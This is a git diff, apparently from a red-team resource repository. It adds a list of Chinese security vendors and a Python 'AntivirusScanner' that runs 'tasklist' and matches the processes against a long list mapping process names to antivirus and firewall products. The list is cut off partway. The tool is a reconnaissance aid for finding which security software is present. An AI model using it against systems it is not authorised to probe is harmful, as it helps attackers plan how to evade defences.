https://www.venustech.com.cn/ +天融信 http://www.topsec.com.cn/ +交大捷普 http://www.jump.net.cn/ +安全狗 http://www.safedog.cn/ +绿盟科技 https://www.nsfocus.com.cn/ +安恒信息 https://www.dbappsecurity.com.cn/ +安天 https://www.antiy.cn/ +北信源 http://www.vrv.com.cn/ +360 https://www.360.cn/ +新华三 http://www.h3c.com/cn/ +阿里云 https://www.aliyun.com/ +奇安信 https://www.qianxin.com/ +斗象科技 https://www.tophant.com/ +海云安 https://www.secidea.com/ +悬镜安全 https://www.xmirror.cn/ +新华三 http://www.h3c.com/cn/ +银科数安 http://www.realroot.cn/home/ +惠尔特 https://www.hereit.com.cn/ +南瑞信通 www.narimall.com +华热科技 http://www.e-heating.cn/ +六方云 https://www.6cloudtech.com/ +四川省工业信息安全创新中心 http://www.icics.com.cn/ +奇安信 https://www.qianxin.com/ +中新赛克 http://www.sinovatio.com/ +利谱信息 https://www.tiptop.com.cn/ +融安网络 http://www.rongannetworks.com/ +云天安全 http://www.cloudskysec.com/ +中电瑞铠 http://www.ri-guard.com/ +木链互联网 https://www.bolean.com.cn/index +亨通信安 http://www.htgd.com.cn/ +玖玖盾 https://www.everfort.cn/ +珞安科技 http://www.icssla.com/ +天地和兴 http://www.tdhxkj.com/ +威努特 http://www.winicssec.com/ +中科网威 http://www.netpower.com.cn/ +中国通信服务公司 http://www.chinaccs.com.cn/ +迪普科技 http://www.dptech.com/ +国泰网信 http://www.go-tech.com.cn/ +启明星辰 https://www.venustech.com.cn/ +天融信 http://www.topsec.com.cn/ +交大捷普 http://www.jump.net.cn/ +绿盟科技 https://www.nsfocus.com.cn/ +安恒信息 https://www.dbappsecurity.com.cn/ +圣博润 http://www.sbr-info.com/ +安天 https://www.antiy.cn/ +北信源 http://www.vrv.com.cn/ +亚信安全 https://www.asiainfo-sec.com/ +360 https://www.360.cn/ +立思辰 http://www.lanxum.com/ +新华三 http://www.h3c.com/cn/ +奇安信 https://www.qianxin.com/ +乾冠安全 http://www.qgs-china.com/ +盛华安 https://www.cyberskysec.com/ +深信服 https://www.sangfor.com.cn/ +天融信 http://www.topsec.com.cn/ +绿盟科技 https://www.nsfocus.com.cn/ +安恒信息 https://www.dbappsecurity.com.cn/ +360 https://www.360.cn/ +新华三 http://www.h3c.com/cn/ +阿里云 https://www.aliyun.com/ +芯盾时代 https://www.trusfort.com/home.html +奇安信 https://www.qianxin.com/ +智安网络 https://www.zhiannet.com/ +腾讯安全 https://s.tencent.com/index.html?ADTAG=media.buy.baidu.pinpai&utm_campaign=%E5%93%81%E7%89%8C%E8%AF%8D&utm_source=baidu&utm_medium=CPC&utm_term=%E8%85%BE%E8%AE%AF%E5%AE%89%E5%85%A8 +网宿科技 https://www.wangsu.com/ +上海缔安 http://www.aolc.cn/ +深信服 https://www.sangfor.com.cn/ +智恒科技 http://zhihengit.com/ +安天 https://www.antiy.cn/ +缔盟云 https://www.cloudaemon.com/ +阿里云 https://www.aliyun.com/ +御安信息 http://yuan-info.com/#/index +云弈科技 https://www.yunyisec.com/home/about +泰岳安全 http://www.ultrapower.com.cn/ +瑞和云图 http://www.rivercloud.com.cn/ +安数云 http://www.datacloudsec.com/ +天懋信息 http://www.trustmo.com/ +梆梆安全 https://www.bangcle.com/ +国舜股份 http://www.unisguard.com/ +默安科技 https://www.moresec.cn/ +长亭科技 https://www.chaitin.cn/ +盛邦安全 http://www.webray.com.cn/ +大乘智能 http://www.dacheng-tech.com/ +深信服 https://www.sangfor.com.cn/ +迪普科技 http://www.dptech.com/ +绿盟科技 https://www.nsfocus.com.cn/ +远望信息 http://www.cnywinfo.com/ +联软科技 http://www.leagsoft.com/ +安天 https://www.antiy.cn/ +北信源 http://www.vrv.com.cn/ +亚信安全 https://www.asiainfo-sec.com/ +360 https://www.360.cn/ +新华三 http://www.h3c.com/cn/ +南瑞信通 www.narimall.com +容辉智信 http://www.rhzhixin.com/ +奇安信 https://www.qianxin.com/ +御安信息 http://yuan-info.com/#/index +安洵信息 http://www.i-soon.net/index.html +全知科技 https://qzkeji.com.cn/ +腾讯安全 https://s.tencent.com/index.html?ADTAG=media.buy.baidu.pinpai&utm_campaign=%E5%93%81%E7%89%8C%E8%AF%8D&utm_source=baidu&utm_medium=CPC&utm_term=%E8%85%BE%E8%AE%AF%E5%AE%89%E5%85%A8 +云弈科技 https://www.yunyisec.com/home/about +智网安云 http://www.zwaytech.com.cn/ +太极安全 https://www.taiji.com.cn/ +谷安天下 http://www.gooann.com/ +九州信泰 http://www.jzxtsec.com/ +梆梆安全 https://www.bangcle.com/ +爱加密 https://www.ijiami.cn/ +国舜股份 http://www.unisguard.com/ +四叶草安全 http://www.seclover.com +安信天行 https://www.axtx.com.cn/ +长亭科技 https://www.chaitin.cn/ +盛邦安全 http://www.webray.com.cn/ +观安信息 https://www.idss-cn.com/ +深信服 https://www.sangfor.com.cn/ +保旺达 http://www.bwda.net/ +中国通信服务公司 http://www.chinaccs.com.cn/ +迪普科技 http://www.dptech.com/ +思维世纪 http://www.siweicn.com/ +上讯信息 http://www.suninfo.com/ +启明星辰 https://www.venustech.com.cn/ +天融信 http://www.topsec.com.cn/ +绿盟科技 https://www.nsfocus.com.cn/ +安恒信息 https://www.dbappsecurity.com.cn/ +安天 https://www.antiy.cn/ +亚信安全 https://www.asiainfo-sec.com/ +360 https://www.360.cn/ +新华三 http://www.h3c.com/cn/ +阿里云 https://www.aliyun.com/ +芯盾时代 https://www.trusfort.com/home.html +握奇智能 https://www.watchdata.com.cn/ +万里红 http://www.superred.com.cn/ +奇安信 https://www.qianxin.com/ +美云智数 http://www.meicloud.com/ +九州云腾 https://idsmanager.com/ +中宇万通 http://www.zhyu.com.cn/ +腾讯安全 https://s.tencent.com/index.html?ADTAG=media.buy.baidu.pinpai&utm_campaign=%E5%93%81%E7%89%8C%E8%AF%8D&utm_source=baidu&utm_medium=CPC&utm_term=%E8%85%BE%E8%AE%AF%E5%AE%89%E5%85%A8 +芯盾集团 https://www.csizg.com/ +瀛联科技 http://www.isccn.cn/ +数字联盟 https://www.shuzilm.cn/main/ +山东微创 http://www.idschn.com/ +泰岳安全 http://www.ultrapower.com.cn/ +美亚柏科 https://www.300188.cn/ +东软 https://www.neusoft.com +广州世安 http://www.gzsa.net/ +任子行 http://www.1218.com.cn/ +深信服 https://www.sangfor.com.cn/ +格尔软件 http://www.koal.com/ +吉大正元 https://www.jit.com.cn/ +天威诚信 https://www.itrus.com.cn/ +数字认证 https://www.bjca.cn/ +久安世纪 https://www.longersec.com/ +得意音通 http://www.d-ear.com/ +安讯奔 https://www.axbsec.com/ +一砂信息 http://www.esandinfo.com/ +创原天地 http://www.ccit.com.cn/ +国民认证 http://gmrz-bj.com/ +信安世纪 http://www.infosec.com.cn/ +飞天诚信 http://www.ftsafe.com.cn/ +极验验证 http://www.geetest.com/ +时代亿信 http://www.eetrust.com/ +渔翁信息 https://www.fisec.cn/ +中安云科 http://www.sinocipher.com/ +东进技术 http://www.donjin.com/ +奥联 https://www.myibc.net/ +江南天安 http://www.tass.com.cn/ +三未信安 http://www.sansec.com.cn/ +启明星辰 https://www.venustech.com.cn/ +中孚信息 http://www.zhongfu.net/ +通付盾 https://www.tongfudun.com/ +绿盟科技 https://www.nsfocus.com.cn/ +卫士通 http://www.westone.com.cn/ +安天 https://www.antiy.cn/ +北信源 http://www.vrv.com.cn/ +信大网御 https://www.ieucd.com/ +威努特 http://www.winicssec.com/ +深信服 https://www.sangfor.com.cn/ +迪普科技 http://www.dptech.com/ +北信源 http://www.vrv.com.cn/ +新华三 http://www.h3c.com/cn/ +芯盾时代 https://www.trusfort.com/home.html +腾讯安全 https://s.tencent.com/index.html?ADTAG=media.buy.baidu.pinpai&utm_campaign=%E5%93%81%E7%89%8C%E8%AF%8D&utm_source=baidu&utm_medium=CPC&utm_term=%E8%85%BE%E8%AE%AF%E5%AE%89%E5%85%A8 +梆梆安全 https://www.bangcle.com/ +爱加密 https://www.ijiami.cn/ +创原天地 http://www.ccit.com.cn/ +信安世纪 http://www.infosec.com.cn/ +渔翁信息 https://www.fisec.cn/ +东进技术 http://www.donjin.com/ +通付盾 https://www.tongfudun.com/ +安天 https://www.antiy.cn/ +阿里云 https://www.aliyun.com/ +天磊卫士 https://www.uguardsec.com/txfh.html +深思科技 http://www.synsec.cn/ +奇安信 https://www.qianxin.com/ +华云安 https://www.huaun.com/ +腾讯安全 https://s.tencent.com/index.html?ADTAG=media.buy.baidu.pinpai&utm_campaign=%E5%93%81%E7%89%8C%E8%AF%8D&utm_source=baidu&utm_medium=CPC&utm_term=%E8%85%BE%E8%AE%AF%E5%AE%89%E5%85%A8 +端御科技 https://www.rtshield.com/ +斗象科技 https://www.tophant.com/ +云天安全 http://www.cloudskysec.com/ +安码科技 http://www.safe-code.com/ +赛宁网安 http://www.cyberpeace.cn/ +永信至诚 http://www.integritytech.com.cn/ +乾冠安全 http://www.qgs-china.com/ +美亚柏科 https://www.300188.cn/ +国舜股份 http://www.unisguard.com/ +默安科技 https://www.moresec.cn/ +四叶草安全 http://www.seclover.com +漏洞银行 https://www.bugbank.cn/ +长亭科技 https://www.chaitin.cn/ +盛邦安全 http://www.webray.com.cn/ +观安信息 https://www.idss-cn.com/ +任子行 http://www.1218.com.cn/ +科来 http://www.colasoft.com.cn/ +深信服 https://www.sangfor.com.cn/ +迪普科技 http://www.dptech.com/ +启明星辰 https://www.venustech.com.cn/ +天融信 http://www.topsec.com.cn/ +青藤云安全 https://qingteng.cn/ +绿盟科技 https://www.nsfocus.com.cn/ +安恒信息 https://www.dbappsecurity.com.cn/ +卫士通 http://www.westone.com.cn/ +圣博润 http://www.sbr-info.com/ +安天 https://www.antiy.cn/ +亚信安全 https://www.asiainfo-sec.com/ +360 https://www.360.cn/ +中睿天下 http://www.zorelworld.com/ +新华三 http://www.h3c.com/cn/ +阿里云 https://www.aliyun.com/ +奇安信 https://www.qianxin.com/ +信达网安 http://www.sinda360.com/ +安在软件 https://www.nsecsoft.com/ +华清信安 https://www.hqsec.com/ +上元信安 http://www.sunyainfo.com/ +百卓信息 https://www.byzoro.com/ +东软 https://www.neusoft.com +锐捷网络 http://www.ruijie.com.cn/ +蓝盾股份 http://www.bluedon.com/ +安博通 http://www.abtnetworks.com/ +任子行 http://www.1218.com.cn/ +网际思安 http://www.safenext.com/ +深信服 https://www.sangfor.com.cn/ +迪普科技 http://www.dptech.com/ +指掌易 https://www.zhizhangyi.com/ +天空卫士 http://www.skyguard.cn/ +启明星辰 https://www.venustech.com.cn/ +天融信 http://www.topsec.com.cn/ +交大捷普 http://www.jump.net.cn/ +恒安嘉新 http://eversec.com.cn/ +绿盟科技 https://www.nsfocus.com.cn/ +北信源 http://www.vrv.com.cn/ +亚信安全 https://www.asiainfo-sec.com/ +360 https://www.360.cn/ +新华三 http://www.h3c.com/cn/ +奇安信 https://www.qianxin.com/ +炼石网络 http://www.ciphergateway.com/ +安领可信 http://www.anlinkin.com/ +恒安讯佳 http://www.hensinder.com/ +红山瑞达 http://hongshanruida.com/security-news/ +奇安信 https://www.qianxin.com/ +谷安天下 http://www.gooann.com/ +美亚柏科 https://www.300188.cn/ +长亭科技 https://www.chaitin.cn/ +安恒信息 https://www.dbappsecurity.com.cn/ +360 https://www.360.cn/ +新华三 http://www.h3c.com/cn/ +奇安信 https://www.qianxin.com/ +中兴通讯 https://www.zte.com.cn/china/about/corporate_information +泰岳安全 http://www.ultrapower.com.cn/ +梆梆安全 https://www.bangcle.com/ +山石网科 https://www.hillstonenet.com.cn/ +思维世纪 http://www.siweicn.com/ +恒安嘉新 http://eversec.com.cn/ +绿盟科技 https://www.nsfocus.com.cn/ +安天 https://www.antiy.cn/ +亚信安全 https://www.asiainfo-sec.com/ +新华三 http://www.h3c.com/cn/ +奇安信 https://www.qianxin.com/ +瑞智康诚 http://www.richctrl.com/ +虎符网络 https://www.tiger-sec.cn/about-us +易安联 https://www.enlink.top +任子行 http://www.1218.com.cn/ +山石网科 https://www.hillstonenet.com.cn/ +深信服 https://www.sangfor.com.cn/ +吉大正元 https://www.jit.com.cn/ +信安世纪 http://www.infosec.com.cn/ +中安云科 http://www.sinocipher.com/ +东进技术 http://www.donjin.com/ +启明星辰 https://www.venustech.com.cn/ +绿盟科技 https://www.nsfocus.com.cn/ +安天 https://www.antiy.cn/ +新华三 http://www.h3c.com/cn/ +嘉韦思 https://cnmstl.net/ +美创科技 http://www.mchz.com.cn/ +绿盟科技 https://www.nsfocus.com.cn/ +安恒信息 https://www.dbappsecurity.com.cn/ +360 https://www.360.cn/ diff --git a/images/README/Awesome-Redteam-20241106.png b/images/README/Awesome-Redteam-20241106.png new file mode 100644 index 0000000..4a762ed Binary files /dev/null and b/images/README/Awesome-Redteam-20241106.png differ diff --git a/scripts/AntivirusScanner/README.md b/scripts/AntivirusScanner/README.md new file mode 100644 index 0000000..a4dcb7c --- /dev/null +++ b/scripts/AntivirusScanner/README.md @@ -0,0 +1,10 @@ +# AntivirusScanner + +## 0x01 功能说明 + +- 杀软进程检测`antivirus_scanner.py` +- 支持进程详见`process.txt` + +## 0x02 运行结果 + +![image-20220531191024577](images/202205311910633.png) \ No newline at end of file diff --git a/scripts/AntivirusScanner/antivirus_scanner.py b/scripts/AntivirusScanner/antivirus_scanner.py new file mode 100644 index 0000000..9ee8b4c --- /dev/null +++ b/scripts/AntivirusScanner/antivirus_scanner.py @@ -0,0 +1,49 @@ +# -*- coding: utf-8 -*- +# @Author : Threekiii +# @Time : 2022/5/27 19:40 +# @Function: 杀软进程检测 + +import re +import os +import subprocess + +def banner(): + print('+--------------------------------------------------') + print('+ \033[36m@Function: 杀软进程检测 \033[0m') + print('+ \033[36m@Author : Threekiii \033[0m') + print('+ \033[31m代码仅供学习,任何人不得将其用于非法用途,否则后果自行承担。 \033[0m') + print('+--------------------------------------------------') + +def check(): + antivirus_list = [] + with open('process.txt', 'r', encoding='utf-8') as f: + content = f.readlines() + try: + print('+ \033[34m正在执行tasklist命令,当前路径: {}\033[0m'.format(os.path.abspath(os.path.dirname(__file__)))) + tmp = subprocess.check_output('tasklist', shell=True).decode() + tasklist = ''.join(re.findall('.*=(.*)', tmp, re.S)).strip().split('\r\n') + print('+ \033[34m正在执行杀软进程检测...\033[0m') + for task in tasklist: + taskname = task.split()[0] + for process in content: + processname = process.strip('\n').split('\"')[1] + if taskname == processname: + result = process.strip('\n').split('\"')[3] + antivirus_list.append('+ \033[31m存在进程:{}, 对应杀软:{}\033[0m'.format(processname, result)) + print('\n+ \033[31m[检测完成] \033[0m') + for al in antivirus_list: + print(al) + except Exception as e: + print('\n+ \033[31m[出现异常] {}\033[0m'.format(e)) + +def run(): + banner() + check() + +if __name__ == '__main__': + run() + + + + + diff --git a/scripts/AntivirusScanner/images/202205311910633.png b/scripts/AntivirusScanner/images/202205311910633.png new file mode 100644 index 0000000..b66ddf5 Binary files /dev/null and b/scripts/AntivirusScanner/images/202205311910633.png differ diff --git a/scripts/AntivirusScanner/process.txt b/scripts/AntivirusScanner/process.txt new file mode 100644 index 0000000..cf9eb4b --- /dev/null +++ b/scripts/AntivirusScanner/process.txt @@ -0,0 +1,536 @@ +"360tray.exe": "360安全卫士-实时保护", +"360safe.exe": "360安全卫士-主程序", +"ZhuDongFangYu.exe": "360安全卫士-主动防御", +"360sd.exe": "360杀毒", +"a2guard.exe": "a-squared杀毒", +"ad-watch.exe": "Lavasoft杀毒", +"cleaner8.exe": "The Cleaner杀毒", +"vba32lder.exe": "vb32杀毒", +"MongoosaGUI.exe": "Mongoosa杀毒", +"CorantiControlCenter32.exe": "Coranti2012杀毒", +"F-PROT.exe": "F-Prot AntiVirus", +"CMCTrayIcon.exe": "CMC杀毒", +"K7TSecurity.exe": "K7杀毒", +"UnThreat.exe": "UnThreat杀毒", +"CKSoftShiedAntivirus4.exe": "Shield Antivirus杀毒", +"AVWatchService.exe": "VIRUSfighter杀毒", +"ArcaTasksService.exe": "ArcaVir杀毒", +"iptray.exe": "Immunet杀毒", +"PSafeSysTray.exe": "PSafe杀毒", +"nspupsvc.exe": "nProtect杀毒", +"SpywareTerminatorShield.exe": "SpywareTerminator反间谍软件", +"BKavService.exe": "Bkav杀毒", +"MsMpEng.exe": "Microsoft Security Essentials", +"SBAMSvc.exe": "VIPRE", +"ccSvcHst.exe": "Norton杀毒", +"f-secure.exe": "冰岛", +"avp.exe": "Kaspersky", +"KvMonXP.exe": "江民杀毒", +"RavMonD.exe": "瑞星杀毒", +"Mcshield.exe": "McAfee", +"Tbmon.exe": "McAfee", +"Frameworkservice.exe": "McAfee", +"egui.exe": "ESET NOD32", +"ekrn.exe": "ESET NOD32", +"eguiProxy.exe": "ESET NOD32", +"kxetray.exe": "金山毒霸", +"knsdtray.exe": "可牛杀毒", +"TMBMSRV.exe": "趋势杀毒", +"avcenter.exe": "Avira(小红伞)", +"avguard.exe": "Avira(小红伞)", +"avgnt.exe": "Avira(小红伞)", +"sched.exe": "Avira(小红伞)", +"ashDisp.exe": "Avast网络安全", +"rtvscan.exe": "诺顿杀毒", +"ccapp.exe": "SymantecNorton", +"NPFMntor.exe": "Norton杀毒软件", +"ccSetMgr.exe": "赛门铁克", +"ccRegVfy.exe": "Norton杀毒软件", +"ksafe.exe": "金山卫士", +"QQPCRTP.exe": "QQ电脑管家", +"avgwdsvc.exe": "AVG杀毒", +"QUHLPSVC.exe": "QUICK HEAL杀毒", +"mssecess.exe": "微软杀毒", +"SavProgress.exe": "Sophos杀毒", +"SophosUI.exe": "Sophos杀毒", +"SophosFS.exe": "Sophos杀毒", +"SophosHealth.exe": "Sophos杀毒", +"SophosSafestore64.exe": "Sophos杀毒", +"SophosCleanM.exe": "Sophos杀毒", +"fsavgui.exe": "F-Secure杀毒", +"vsserv.exe": "比特梵德", +"remupd.exe": "熊猫卫士", +"FortiTray.exe": "飞塔", +"safedog.exe": "安全狗", +"parmor.exe": "木马克星", +"Iparmor.exe.exe": "木马克星", +"beikesan.exe": "贝壳云安全", +"KSWebShield.exe": "金山网盾", +"TrojanHunter.exe": "木马猎手", +"GG.exe": "巨盾网游安全盾", +"adam.exe": "绿鹰安全精灵", +"AST.exe": "超级巡警", +"ananwidget.exe": "墨者安全专家", +"AVK.exe": "AntiVirusKit", +"avg.exe": "AVG Anti-Virus", +"spidernt.exe": "Dr.web", +"avgaurd.exe": "Avira Antivir", +"vsmon.exe": "Zone Alarm", +"cpf.exe": "Comodo", +"outpost.exe": "Outpost Firewall", +"rfwmain.exe": "瑞星防火墙", +"kpfwtray.exe": "金山网镖", +"FYFireWall.exe": "风云防火墙", +"MPMon.exe": "微点主动防御", +"pfw.exe": "天网防火墙", +"BaiduSdSvc.exe": "百度杀毒-服务进程", +"BaiduSdTray.exe": "百度杀毒-托盘进程", +"BaiduSd.exe": "百度杀毒-主程序", +"SafeDogGuardCenter.exe": "安全狗", +"safedogupdatecenter.exe": "安全狗", +"safedogguardcenter.exe": "安全狗", +"SafeDogSiteIIS.exe": "安全狗", +"SafeDogTray.exe": "安全狗", +"SafeDogServerUI.exe": "安全狗", +"D_Safe_Manage.exe": "D盾", +"d_manage.exe": "D盾", +"yunsuo_agent_service.exe": "云锁", +"yunsuo_agent_daemon.exe": "云锁", +"HwsPanel.exe": "护卫神", +"hws_ui.exe": "护卫神", +"hws.exe": "护卫神", +"hwsd.exe": "护卫神", +"hipsdaemon.exe": "火绒", +"hipstray.exe": "火绒", +"wsctrl.exe": "火绒", +"usysdiag.exe": "火绒", +"SPHINX.exe": "SPHINX防火墙", +"bddownloader.exe": "百度卫士", +"baiduansvx.exe": "百度卫士-主进程", +"AvastUI.exe": "Avast!5主程序", +"emet_agent.exe": "EMET", +"emet_service.exe": "EMET", +"firesvc.exe": "McAfee", +"firetray.exe": "McAfee", +"hipsvc.exe": "McAfee", +"mfevtps.exe": "McAfee", +"mcafeefire.exe": "McAfee", +"scan32.exe": "McAfee", +"shstat.exe": "McAfee", +"vstskmgr.exe": "McAfee", +"engineserver.exe": "McAfee", +"mfeann.exe": "McAfee", +"mcscript.exe": "McAfee", +"updaterui.exe": "McAfee", +"udaterui.exe": "McAfee", +"naprdmgr.exe": "McAfee", +"cleanup.exe": "McAfee", +"cmdagent.exe": "McAfee", +"frminst.exe": "McAfee", +"mcscript_inuse.exe": "McAfee", +"mctray.exe": "McAfee", +"_avp32.exe": "卡巴斯基", +"_avpcc.exe": "卡巴斯基", +"_avpm.exe": "卡巴斯基", +"aAvgApi.exe": "AVG", +"ackwin32.exe": "已知杀软进程,名称暂未收录", +"alertsvc.exe": "Norton AntiVirus", +"alogserv.exe": "McAfee VirusScan", +"anti-trojan.exe": "Anti-Trojan Elite", +"arr.exe": "Application Request Route", +"atguard.exe": "AntiVir", +"atupdater.exe": "已知杀软进程,名称暂未收录", +"atwatch.exe": "Mustek", +"au.exe": "NSIS", +"aupdate.exe": "Symantec", +"auto-protect.nav80try.exe": "已知杀软进程,名称暂未收录", +"autodown.exe": "AntiVirus AutoUpdater", +"avconsol.exe": "McAfee", +"avgcc32.exe": "AVG", +"avgctrl.exe": "AVG", +"avgemc.exe": "AVG", +"avgrsx.exe": "AVG", +"avgserv.exe": "AVG", +"avgserv9.exe": "AVG", +"avgw.exe": "AVG", +"avkpop.exe": "G DATA SOFTWARE AG", +"avkserv.exe": "G DATA SOFTWARE AG", +"avkservice.exe": "G DATA SOFTWARE AG", +"avkwctl9.exe": "G DATA SOFTWARE AG", +"avltmain.exe": "Panda Software Aplication", +"avnt.exe": "H+BEDV Datentechnik GmbH", +"avp32.exe": "Kaspersky Anti-Virus", +"avpcc.exe": " Kaspersky AntiVirus", +"avpdos32.exe": " Kaspersky AntiVirus", +"avpm.exe": " Kaspersky AntiVirus", +"avptc32.exe": " Kaspersky AntiVirus", +"avpupd.exe": " Kaspersky AntiVirus", +"avsynmgr.exe": "McAfee", +"avwin.exe": " H+BEDV", +"bargains.exe": "Exact Advertising SpyWare", +"beagle.exe": "Avast", +"blackd.exe": "BlackICE", +"blackice.exe": "BlackICE", +"blink.exe": "micromedia", +"blss.exe": "CBlaster", +"bootwarn.exe": "Symantec", +"bpc.exe": "Grokster", +"brasil.exe": "Exact Advertising", +"ccevtmgr.exe": "Norton Internet Security", +"cdp.exe": "CyberLink Corp.", +"cfd.exe": "Motive Communications", +"cfgwiz.exe": " Norton AntiVirus", +"claw95.exe": "已知杀软进程,名称暂未收录", +"claw95cf.exe": "已知杀软进程,名称暂未收录", +"clean.exe": "windows流氓软件清理大师", +"cleaner.exe": "windows流氓软件清理大师", +"cleaner3.exe": "windows流氓软件清理大师", +"cleanpc.exe": "windows流氓软件清理大师", +"cpd.exe": "McAfee", +"ctrl.exe": "已知杀软进程,名称暂未收录", +"cv.exe": "已知杀软进程,名称暂未收录", +"defalert.exe": "Symantec", +"defscangui.exe": "Symantec", +"defwatch.exe": "Norton Antivirus", +"doors.exe": "已知杀软进程,名称暂未收录", +"dpf.exe": "已知杀软进程,名称暂未收录", +"dpps2.exe": "PanicWare", +"dssagent.exe": "Broderbund", +"ecengine.exe": "已知杀软进程,名称暂未收录", +"emsw.exe": "Alset Inc", +"ent.exe": "已知杀软进程,名称暂未收录", +"espwatch.exe": "已知杀软进程,名称暂未收录", +"ethereal.exe": "RationalClearCase", +"exe.avxw.exe": "已知杀软进程,名称暂未收录", +"expert.exe": "已知杀软进程,名称暂未收录", +"f-prot95.exe": "已知杀软进程,名称暂未收录", +"fameh32.exe": "F-Secure", +"fast.exe": " FastUsr", +"fch32.exe": "F-Secure", +"fih32.exe": "F-Secure", +"findviru.exe": "F-Secure", +"firewall.exe": "AshampooSoftware", +"fnrb32.exe": "F-Secure", +"fp-win.exe": " F-Prot Antivirus OnDemand", +"fsaa.exe": "F-Secure", +"fsav.exe": "F-Secure", +"fsav32.exe": "F-Secure", +"fsav530stbyb.exe": "F-Secure", +"fsav530wtbyb.exe": "F-Secure", +"fsav95.exe": "F-Secure", +"fsgk32.exe": "F-Secure", +"fsm32.exe": "F-Secure", +"fsma32.exe": "F-Secure", +"fsmb32.exe": "F-Secure", +"gbmenu.exe": "已知杀软进程,名称暂未收录", +"guard.exe": "ewido", +"guarddog.exe": "ewido", +"htlog.exe": "已知杀软进程,名称暂未收录", +"htpatch.exe": "Silicon Integrated Systems Corporation", +"hwpe.exe": "已知杀软进程,名称暂未收录", +"iamapp.exe": "Symantec", +"iamserv.exe": "Symantec", +"iamstats.exe": "Symantec", +"iedriver.exe": " Urlblaze.com", +"iface.exe": "Panda Antivirus Module", +"infus.exe": "Infus Dialer", +"infwin.exe": "Msviewparasite", +"intdel.exe": "Inet Delivery", +"intren.exe": "已知杀软进程,名称暂未收录", +"jammer.exe": "已知杀软进程,名称暂未收录", +"kavpf.exe": "Kapersky", +"kazza.exe": "Kapersky", +"keenvalue.exe": "EUNIVERSE INC", +"launcher.exe": "Intercort Systems", +"ldpro.exe": "已知杀软进程,名称暂未收录", +"ldscan.exe": "Windows Trojans Inspector", +"localnet.exe": "已知杀软进程,名称暂未收录", +"luall.exe": "Symantec", +"luau.exe": "Symantec", +"lucomserver.exe": "Norton", +"mcagent.exe": "McAfee", +"mcmnhdlr.exe": "McAfee", +"mctool.exe": "McAfee", +"mcupdate.exe": "McAfee", +"mcvsrte.exe": "McAfee", +"mcvsshld.exe": "McAfee", +"mfin32.exe": "MyFreeInternetUpdate", +"mfw2en.exe": "MyFreeInternetUpdate", +"mfweng3.02d30.exe": "MyFreeInternetUpdate", +"mgavrtcl.exe": "McAfee", +"mgavrte.exe": "McAfee", +"mghtml.exe": "McAfee", +"mgui.exe": "BullGuard", +"minilog.exe": "Zone Labs Inc", +"mmod.exe": "EzulaInc", +"mostat.exe": "WurldMediaInc", +"mpfagent.exe": "McAfee", +"mpfservice.exe": "McAfee", +"mpftray.exe": "McAfee", +"mscache.exe": "Integrated Search Technologies Spyware", +"mscman.exe": "OdysseusMarketingInc", +"msmgt.exe": "Total Velocity Spyware", +"msvxd.exe": "W32/Datom-A", +"mwatch.exe": "已知杀软进程,名称暂未收录", +"nav.exe": "Reuters Limited", +"navapsvc.exe": "Norton AntiVirus", +"navapw32.exe": "Norton AntiVirus", +"navw32.exe": "Norton Antivirus", +"ndd32.exe": "诺顿磁盘医生", +"neowatchlog.exe": "已知杀软进程,名称暂未收录", +"netutils.exe": "已知杀软进程,名称暂未收录", +"nisserv.exe": "Norton", +"nisum.exe": "Norton", +"nmain.exe": "Norton", +"nod32.exe": "ESET Smart Security", +"norton_internet_secu_3.0_407.exe": "已知杀软进程,名称暂未收录", +"notstart.exe": "已知杀软进程,名称暂未收录", +"nprotect.exe": "Symantec", +"npscheck.exe": "Norton", +"npssvc.exe": "Norton", +"ntrtscan.exe": "趋势反病毒应用程序", +"nui.exe": "已知杀软进程,名称暂未收录", +"otfix.exe": "已知杀软进程,名称暂未收录", +"outpostinstall.exe": "Outpost", +"patch.exe": "趋势科技", +"pavw.exe": "已知杀软进程,名称暂未收录", +"pcscan.exe": "趋势科技", +"pdsetup.exe": "已知杀软进程,名称暂未收录", +"persfw.exe": "Tiny Personal Firewall", +"pgmonitr.exe": "PromulGate SpyWare", +"pingscan.exe": "已知杀软进程,名称暂未收录", +"platin.exe": "已知杀软进程,名称暂未收录", +"pop3trap.exe": "PC-cillin", +"poproxy.exe": "NortonAntiVirus", +"popscan.exe": "已知杀软进程,名称暂未收录", +"powerscan.exe": "Integrated Search Technologies", +"ppinupdt.exe": "已知杀软进程,名称暂未收录", +"pptbc.exe": "已知杀软进程,名称暂未收录", +"ppvstop.exe": "已知杀软进程,名称暂未收录", +"prizesurfer.exe": "Prizesurfer", +"prmt.exe": "OpiStat", +"prmvr.exe": "Adtomi", +"processmonitor.exe": "Sysinternals", +"proport.exe": "已知杀软进程,名称暂未收录", +"protectx.exe": "ProtectX", +"pspf.exe": "已知杀软进程,名称暂未收录", +"purge.exe": "已知杀软进程,名称暂未收录", +"qconsole.exe": "Norton AntiVirus Quarantine Console", +"qserver.exe": "Norton Internet Security", +"rapapp.exe": "BlackICE", +"rb32.exe": "RapidBlaster", +"rcsync.exe": "PrizeSurfer", +"realmon.exe": "Realmon ", +"rescue.exe": "已知杀软进程,名称暂未收录", +"rescue32.exe": "卡巴斯基互联网安全套装", +"rshell.exe": "已知杀软进程,名称暂未收录", +"rtvscn95.exe": "Real-time virus scanner ", +"rulaunch.exe": "McAfee User Interface", +"run32dll.exe": "PAL PC Spy", +"safeweb.exe": "PSafe Tecnologia", +"sbserv.exe": "Norton Antivirus", +"scrscan.exe": "360杀毒", +"sfc.exe": "System file checker", +"sh.exe": "MKS Toolkit for Win3", +"showbehind.exe": "MicroSmarts Enterprise Component ", +"soap.exe": "System Soap Pro", +"sofi.exe": "已知杀软进程,名称暂未收录", +"sperm.exe": "已知杀软进程,名称暂未收录", +"supporter5.exe": "eScorcher反病毒", +"symproxysvc.exe": "Symantec", +"symtray.exe": "Symantec", +"tbscan.exe": "ThunderBYTE", +"tc.exe": "TimeCalende", +"titanin.exe": "TitanHide", +"tvmd.exe": "Total Velocity", +"tvtmd.exe": " Total Velocity", +"vettray.exe": "eTrust", +"vir-help.exe": "已知杀软进程,名称暂未收录", +"vnpc3000.exe": "已知杀软进程,名称暂未收录", +"vpc32.exe": "Symantec", +"vpc42.exe": "Symantec", +"vshwin32.exe": "McAfee", +"vsmain.exe": "McAfee", +"vsstat.exe": "McAfee", +"wfindv32.exe": "已知杀软进程,名称暂未收录", +"zapro.exe": "Zone Alarm", +"zonealarm.exe": "Zone Alarm", +"AVPM.exe": "Kaspersky", +"A2CMD.exe": "Emsisoft Anti-Malware", +"A2SERVICE.exe": "a-squared free", +"A2FREE.exe": "a-squared Free", +"ADVCHK.exe": "Norton AntiVirus", 